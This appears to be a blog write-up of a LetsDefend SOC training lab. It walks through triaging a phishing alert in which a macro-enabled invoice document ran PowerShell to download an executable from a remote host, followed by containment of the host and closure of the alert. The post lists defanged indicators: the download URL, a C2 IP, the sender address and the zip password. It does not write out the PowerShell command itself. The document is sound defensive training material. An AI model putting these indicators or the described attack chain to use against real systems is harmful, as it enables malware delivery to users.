Above is the alert we see which is a "Medium" severity alert.
We start with taking the ownership of the alert and start to investigate it.
Next we go ahead to the investigation channel and create the case
for this investigation
The next step for us is to start the playbook.
We look up the file hash on VirusTotal and here is what we find:
We can conclude that the file is malicious since 31 out of 67 vendors have flagged it malicious.
After searching the IP on Log Management tab, we find the following information:
- At 8:41 a file named
C:\Users\LetsDefend\Downloads\edit1-invoice.docm.ziphas been created (EventID 11 - File Created) - User opens the Document and a macro code executes PowerShell command and execute the download of the remote ressource(
messbox.exeand save it asmess.exe) at hxxp[:]//www[.]greyhathacker[.]net/tools/messbox[.]exe - PowerShell caused a DNS lookup for the C2 host (92[.]204[.]221[.]16)
We search for the file name on the Email Security tab and find an email that was used to deliver this file to Jayne
From: jake.admin@cybercommunity.info
To: jayne@letsdefend.io
Subject: February Membership Fee
Date: Feb, 28, 2024, 08:12 AM
Action: Allowed
Attachment: edit1-invoice.docm.zip
Password: infected
Since we know that the file is malicious and was executed on the host Jayne, we need to contain that host.
Host is successfully contained.
Defined threat indicator: Other
Check if the malware is quarantined/cleaned: Not quarantined
The malware is: malicious
C2: accessed
Containment is done.
Artifacts added:
Analyst's note added:
`
On February 28, 2024, at 08:42 AM, a user on host Jayne (IP: 172.16.17.198) opened a malicious macro-enabled Word document named edit1-invoice.docm. The embedded macro executed a PowerShell command that attempted to download a remote executable from www[.]greyhathacker[.]net (92.204.221[.]16). This activity was logged by Sysmon and other endpoint telemetry, including DNS queries and script block execution.
Earlier, at 08:12 AM, a phishing email originating from jake.admin[@]cybercommunity[.]info was sent to Jayne, containing the malicious document.
This incident is classified as high severity, as it enabled the download and potential execution of malware. Immediate containment measures included isolating the affected host, preserving relevant artifacts, and defanging the IOCs for safe reporting.
`
PLaybook is now completed:
Now we close the alert.
Top comments (0)